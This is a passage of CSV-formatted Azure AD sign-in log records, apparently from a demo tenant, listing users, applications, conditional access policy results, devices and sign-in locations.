'2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '69c7a12f-b407-45a3-b07e-fa04fc7f273d'}]",success,09/04/2020 14:01,"{'operatingSystem': 'Windows 10', 'deviceId': '', 'browser': 'Edge 80.0.361'}",f7ba3cc7-11fe-4554-9ac4-efced7ef1300,,,"{'countryOrRegion': 'BE', 'geoCoordinates': {'longitude': 5.572050094604492, 'latitude': 50.64065170288086}, 'state': 'Liege', 'city': 'Liege'}",none,none,none,none,[],"{'errorCode': 0, 'additionalDetails': 'MFA requirement satisfied by claim in the token'}",Admin,bdb72692-2275-412b-8af0-ea21c2ebd174,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Windows Azure Service Management API,f7ba3cc7-11fe-4554-9ac4-efced7ef1300,SigninLogs,Sucess,50.6406517,5.572050095
+706,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,19:04.3,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,ef0a1e80-9cfd-49bd-872c-429dfdac8205,Microsoft.aadiam,Microsoft.aadiam,,PC Admin,4,IL,Azure Active Directory PowerShell,1b730954-1685-4b74-9bfd-dac224a7b894,Mobile Apps and Desktop clients,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '69c7a12f-b407-45a3-b07e-fa04fc7f273d'}]",notApplied,09/04/2020 14:19,"{'operatingSystem': 'Windows 10', 'deviceId': '', 'browser': 'IE 7.0'}",ed279ba5-6389-4198-91ad-627ed6741400,,,"{'countryOrRegion': 'IL', 'geoCoordinates': {'longitude': 34.85319900512695, 'latitude': 32.32146072387695}, 'state': 'Hamerkaz', 'city': 'Netanya'}",none,none,none,none,[],{'errorCode': 0},PC Admin,95289cbf-4ab6-46f3-804b-c9a6f2ef1227,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Windows Azure Active Directory,ed279ba5-6389-4198-91ad-627ed6741400,SigninLogs,Sucess,32.32146072,34.85319901
+707,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,01:59.4,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,4c1a4d95-77d1-4cbb-b1c0-e381bfa72e16,Microsoft.aadiam,Microsoft.aadiam,,Caroline Lee,4,US,Office Online Client AAD- Augmentation Loop,2abdc806-e091-4495-9b10-b04d93c3f040,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '69c7a12f-b407-45a3-b07e-fa04fc7f273d'}]",notApplied,09/04/2020 14:01,"{'operatingSystem': 'Windows 10', 'deviceId': '', 'browser': 'Chrome 80.0.3987'}",a9f59943-bd83-455b-86cd-4cf197fe1400,,,"{'countryOrRegion': 'US', 'geoCoordinates': {'longitude': -84.3882827758789, 'latitude': 33.798458099365234}, 'state': 'Georgia', 'city': 'Atlanta'}",none,none,none,none,[],{'errorCode': 0},Caroline Lee,ee9ea8b3-5b09-4c36-8739-24856720b373,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Augmentation Loop,a9f59943-bd83-455b-86cd-4cf197fe1400,SigninLogs,Sucess,33.7984581,-84.38828278
+708,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,29:00.4,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,a1165b22-be1d-4e78-8b8a-73a0d8bbff2b,Microsoft.aadiam,Microsoft.aadiam,,Ashish Kapila,4,GB,Azure Portal,c44b4083-3bb0-49c1-b47d-974e53cbdf3c,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '69c7a12f-b407-45a3-b07e-fa04fc7f273d'}]",notApplied,09/04/2020 14:29,"{'operatingSystem': 'Windows 10', 'deviceId': 'a8835158-f705-4014-a58f-5a04beb76aba', 'browser': 'Edge 80.0.361', 'displayName': 'MININT-15OQVR5', 'trustType': 'Hybrid Azure AD joined', 'isCompliant': True, 'isManaged': True}",d77c7786-598c-479a-9381-435030f30e00,,,"{'countryOrRegion': 'GB', 'geoCoordinates': {'longitude': -0.9697200059890749, 'latitude': 51.445831298828125}, 'state': 'Reading', 'city': 'Reading'}",none,none,none,none,[],{'errorCode': 0},Ashish Kapila,61c20c19-6e81-4684-affc-fdb7086bb546,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Windows Azure Service Management API,d77c7786-598c-479a-9381-435030f30e00,SigninLogs,Sucess,51.4458313,-0.969720006
+709,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,59:27.1,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,3b8be8a8-ef28-453d-b76d-658753bb1e07,Microsoft.aadiam,Microsoft.aadiam,,Admin,4,BE,Azure Portal,c44b4083-3bb0-49c1-b47d-974e53cbdf3c,Browser,"[{'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 3, 'displayName': 'Semolen - Admin MFA', 'result': 'success', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '69c7a12f-b407-45a3-b07e-fa04fc7f273d'}]",success,09/04/2020 13:59,"{'operatingSystem': 'Windows 10', 'deviceId': '', 'browser': 'Edge 80.0.361'}",93d4df14-2ec3-46f2-a774-ff587eb41600,,,"{'countryOrRegion': 'BE', 'geoCoordinates': {'longitude': 5.572050094604492, 'latitude': 50.64065170288086}, 'state': 'Liege', 'city': 'Liege'}",none,none,none,none,[],"{'errorCode': 0, 'additionalDetails': 'MFA requirement satisfied by claim in the token'}",Admin,bdb72692-2275-412b-8af0-ea21c2ebd174,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Windows Azure Service Management API,93d4df14-2ec3-46f2-a774-ff587eb41600,SigninLogs,Sucess,50.6406517,5.572050095
+710,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,59:29.4,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,3b8be8a8-ef28-453d-b76d-658753bb1e07,Microsoft.aadiam,Microsoft.aadiam,,Admin,4,BE,Azure Portal,c44b4083-3bb0-49c1-b47d-974e53cbdf3c,Browser,"[{'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 3, 'displayName': 'Semolen - Admin MFA', 'result': 'success', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '69c7a12f-b407-45a3-b07e-fa04fc7f273d'}]",success,09/04/2020 13:59,"{'operatingSystem': 'Windows 10', 'deviceId': '', 'browser': 'Edge 80.0.361'}",93d4df14-2ec3-46f2-a774-ff58d6b41600,,,"{'countryOrRegion': 'BE', 'geoCoordinates': {'longitude': 5.572050094604492, 'latitude': 50.64065170288086}, 'state': 'Liege', 'city': 'Liege'}",none,none,none,none,[],"{'errorCode': 0, 'additionalDetails': 'MFA requirement satisfied by claim in the token'}",Admin,bdb72692-2275-412b-8af0-ea21c2ebd174,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Windows Azure Service Management API,93d4df14-2ec3-46f2-a774-ff58d6b41600,SigninLogs,Sucess,50.6406517,5.572050095
+711,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,21:25.6,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,5561cabe-aaad-412e-bbf2-ad9151c34155,Microsoft.aadiam,Microsoft.aadiam,,On-Premises Directory Synchronization Service Account,4,US,Microsoft Azure Active Directory Connect,cb1056e2-e479-49de-ae31-7812af012ed8,Mobile Apps and Desktop clients,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '69c7a12f-b407-45a3-b07e-fa04fc7f273d'}]",notApplied,09/04/2020 14:21,"{'operatingSystem': 'Windows 8', 'deviceId': '', 'browser': 'Rich Client 5.0.5.0'}",ca20f843-0c09-4066-88a0-3d47d0f41600,,,"{'countryOrRegion': 'US', 'geoCoordinates': {'longitude': -78.26995086669922, 'latitude': 36.64046859741211}, 'state': 'Virginia', 'city': 'Boydton'}",none,none,none,none,[],{'errorCode': 0},On-Premises Directory Synchronization Service Account,b5084e7d-75cb-41c3-949b-bf61e1f9636b,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Windows Azure Active Directory,ca20f843-0c09-4066-88a0-3d47d0f41600,SigninLogs,Sucess,36.6404686,-78.26995087
+712,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,26:53.9,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,6ef9b2ea-4074-4907-b829-7aae36606cba,Microsoft.aadiam,Microsoft.aadiam,,Brandon,4,US,Azure Advanced Threat Protection,7b7531ad-5926-4f2d-8a1d-38495ad33e17,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '69c7a12f-b407-45a3-b07e-fa04fc7f273d'}]",notApplied,08/04/2020 23:26,"{'operatingSystem': 'Windows 10', 'deviceId': '', 'browser': 'Edge 83.0.478'}",cfab9824-c87d-41e8-8623-1f6d92350400,,,"{'countryOrRegion': 'US', 'geoCoordinates': {'longitude': -85.99833679199219, 'latitude': 41.90428924560547}, 'state': 'Michigan', 'city': 'Cassopolis'}",none,none,none,none,[],{'errorCode': 0},Brandon,9dadd76f-3237-4e1d-84e7-e45c59867492,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Azure Advanced Threat Protection,cfab9824-c87d-41e8-8623-1f6d92350400,SigninLogs,Sucess,41.90428925,-85.99833679
+713,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,30:35.6,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,85224c1b-590f-46bf-8c5e-e6a86fbfb529,Microsoft.aadiam,Microsoft.aadiam,,Cristhofer Romeo Muñoz,4,US,Azure Portal,c44b4083-3bb0-49c1-b47d-974e53cbdf3c,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, 